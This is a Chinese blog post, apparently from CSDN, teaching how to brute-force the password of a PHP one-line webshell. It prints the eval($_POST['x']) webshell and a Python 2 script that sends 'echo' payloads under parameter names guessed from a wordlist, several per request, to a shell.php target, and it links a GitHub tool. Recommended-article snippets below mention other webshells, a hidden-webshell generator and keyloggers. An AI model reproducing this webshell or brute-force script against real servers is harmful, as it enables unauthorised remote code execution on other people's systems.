python hacker_Python hacker 之 爆破一句话木马

最新推荐文章于 2024-05-01 17:39:08 发布
最新推荐文章于 2024-05-01 17:39:08 发布
阅读量505 收藏
点赞数
文章标签: python hacker

00x1:

需要用到的模块如下:

import requests

00x2:

首先我们了解一下一句话木马,一般post传递参

一个简单的php一句话木马eval($_POST['x'])

?>

先测试一下连接

OK,没问题,我们用浏览器打开传参看一下

由此可以看到密码为x,变量提交能匹配上即执行echo语句

这时我猜大家都有了思路,构造post请求即可

00x3:

这里我们可以利用网址特性提交多个参数

这样可以提高爆破效率

分析完成,下面我们开始进行写脚本

00x4:

简单爆破shell密码,shell为字典#!/usr/bin/python

#-*- coding:utf-8 -*-

import requests

def req(url,s):

global html

data = {s:'echo xc666;'}

req = requests.post(url,data=data)

html = req.content

shell = ['z','y','x']

for s in shell:

req('http://127.0.0.1/shell.php',s)

if 'xc666' in html:

print "[+]Find password",s

break

00x5:

下面我们按我们刚才说的,一次多个参数,增加效率

首先整理一下字典shell = []

f = open('shell.txt','r')

for x in f.readlines(): #去除换行等字符

x = x.strip()

shell.append(x)

print u"shell密码个数为:",len(shell)

for i in range(0,len(shell),2): #分割列表

b=shell[i:i+2]

print b

我们一次性提交两个参数测试一下data = {s:'echo %s;'%s,ss:'echo %s;'%ss}

shell = []

def shelllist():

f = open('shell.txt','r')

for x in f.readlines(): #去除换行等字符

x = x.strip()

shell.append(x)

print u"shell密码个数为:",len(shell)

def main():

shelllist()

for i in range(0,len(shell),2): #分割列表

b=shell[i:i+2]

req('http://127.0.0.1/shell.php',b[0],b[1])

if b[0] in html:

print "[+]Find password",b[0]

break

elif b[1] in html:

print "[+]Find password", b[1]

break

main()

测试一下,一次执行两个密码

00x6:

https://github.com/hackxc/Pyhacker/

github项目地址

一次爆破5次密码,可自行调整

weixin_39846898
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python hack_Python与Hack
weixin_39699121的博客
11-20 232
1.Python的函数:关键字def()表示函数开始,可以在括号内填写任何变量,然后这些变量会被以引用的方式传递给函数,也就是说,函数内对这些变量的任何改变都会影响它们在主调函数中的值:2.迭代:用for循环遍历多个元素;>>>for x in range(1,255):print("194.168.95."+str(x))>>>portList=[21,22,25,80,110]>>>for p...
python hack_Python 有哪些黑魔法?
weixin_39852953的博客
11-23 97
Python的黑魔法当然是各种自省和动态绑定了。举个例子,Python可以重新绑定解释器的excepthook,这样当程序异常结束时就可以做一些自定义的处理,我自己就一直拿这个配合ipdb进行debug。用以下代码声明一个ExceptionHook:class ExceptionHook :instance = Nonedef __call__(self, *args, **kwargs) :if...
如何使用Python编写简易木马程序(2)
最新发布
2401_84140560的博客
05-01 29
说起Keylogger,大家的思维可能早已飞向带有wifi功能的mini小硬件去了。抛开高科技,我们暂且回归本质,探探简易键盘记录器的原理与实现。Python keylogger键盘记录的功能的实现主要利用了pythoncom及pythonhook,然后就是对windows API的各种调用。Python之所以用起来方便快捷,主要归功于这些庞大的支持库,正所谓“人生苦短,快用Python”。
【PyHacker编写指南】打造网站后台扫描器
XunanSec的博客
05-12 342
这节课是巡安似海PyHacker编写指南的《打造网站后台扫描器》包括如何处理假的200页面/404智能判断等喜欢用Python写脚本的小伙伴可以跟着一起写一写呀。编写环境:Python2.x
PHP 一句木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
百彦子烨的博客
11-10 2万+
该文章对PHP一句木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
python实现生成隐藏的一句木马
qq_55213436的博客
07-28 1947
这个webshell的原理就是每一行最后都有空格与制表符。\t的数量代表着ascii码16进制的第一位,空格的数量代表着ascii码16进制的第二位。然后有个关键的15,其实代表了前15行的空白字符组成的是create_function,后面就可以写一句咯,例如@eval($_GET["pass"]);demo.php这样就可以生成一个让人摸不着头脑的php木马文件,内容和demo.php一模一样,但是利用webshellkiller工具、安全狗、D盾是无法识别出来的。...
Hacker_Defender_ROOKIT.rar_hacker_木马_木马 扫描_木马扫描
09-22
黑客,通常指的是那些利用技术手段非法入侵他人系统的人,而木马则是他们常用的工具之一。本文将围绕"黑客防御"这一主题,深入探讨木马的概念、特征以及如何进行有效的木马扫描。 木马(Trojan)是一种恶意软件,它...
Hackerrank_Python_Domain_Solutions:Hackerrank Python域挑战的解决方案
05-02
我对Hackerrank Python域挑战的解决方案。 如果您被卡在某个地方,这些代码可能会抢先一步! 如果您有更好的代码(我喜欢可读代码而不是短划线),请发送请求请求。 可以在这里找到挑战 奖励:我创建了Hackerrank...
Python库 | hacker_news-1.1.1.tar.gz
05-16
资源分类:Python库 所属语言:Python 资源全名:hacker_news-1.1.1.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
HackerRank_Python:黑客等级Python
04-18
在编程世界中,Python是一种广泛使用的高级编程语言,以其简洁、易读的语法而闻名,尤其受到初学者和专业开发者的喜爱。HackerRank是一个在线平台,它为程序员提供了各种编程挑战,帮助他们提高技能,准备面试,或者...
Resource_Hacker_v5.1.6绿色版.zip
08-20
资源 Hacker 是一款强大的Windows应用程序资源编辑工具,主要用于查看、修改、添加、删除以及替换应用程序中的资源,如图标、对框、菜单、字符串表等。在本文中,我们将深入探讨Resource Hacker的功能、使用方法...
Python_Hack.pdf
07-15
python应用越来月广泛,基于Python全栈开发的应用越来越多,那基于python开发应用的安全问题也越来越严峻,Python安全应该像PHP一样得到重视。 —Python_Hack该PDF来自知道创宇_北北
asp一句html,asp常用的一句木马大全
weixin_31558841的博客
06-28 2467
【入侵技术】 ASP一句木马大全""ThenExecute(Request("MH"))%>""thensession("MH")=request("MH"):endif:ifsession("MH")<>""thenexecutesession("MH")%>executerequest("MH")1asp一句木马一句木马 服务器端带验证:cmd.aspif...
PHP之一句木马
热门推荐
bolinmengling的博客
02-27 2万+
一句木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句木马通过P​OST是传入的参数,此处使用的...
html c ashx,探索基于.NET下实现一句木马之ashx篇
weixin_36168629的博客
06-21 504
0x01 前言在渗透测试的时候各种PHP版的一句木马已经琳琅满目,而.NET平台下的一句木马则百年不变,最常见的当属下面这句想必这句已经成大多数防御产品的标准样本,除此以外还有上传文件的一句,像这种的从严格意义上不能算是一句木马,只是一个简单的上传文件的功能,实际的操作还是大马或者小马的操作行为。笔者感觉有必要挖坑一下.NET平台里的一句木马,经过一番摸索填坑终于可以总结出了.NET下...
python+php一句木马的利用
CYLK1987310466的博客
07-29 1307
python知识点,php一句木马
一句木马@eval($_POST[“cmd“]);是什么意思(超详细)
qq_62708558的博客
02-20 2万+
再加上eval()方法函数将用户输入的字符串进行执行,那么用户便可以通过输入php语句来达到任意操作数据库和服务器的效果了
常用Python
Hacking to the gate.
03-01 800
Tkinter———— Python默认的图形界面接口。Tkinter是一个和Tk接口的Python模块,Tkinter库提供了对Tk API的接口,它属于Tcl/Tk的GUI工具组。Tcl/Tk是由John Ousterhout发展的书写和图形设备。Tcl(工具命令语言)是个宏语言,用于简化shell下复杂程序的开发,Tk工具包是和Tcl一起开发的,目的是为了简化用户接口的设计过程。Tk工具包由
Aspx 一句木马和客户端(备用)
eldn__的专栏
04-18 1632
以下是引用片段: 这个一句不用说了!我之前已经发表文章讲解过! client端HTML页面代码如下 以下是引用片段: I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320 body,td{font-size: 12px;} table{T:expression(this.border='1',this.borderColorLigh
hackerrank python
10-02
hackerrank python 中的引用内容提到了两种方法来找到一个列表中的第二高的成绩,并输出对应的名字。第一种方法是使用集合和sum函数,通过计算两个集合的差集来找到第二高的成绩,并输出对应的名字。第二种方法是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值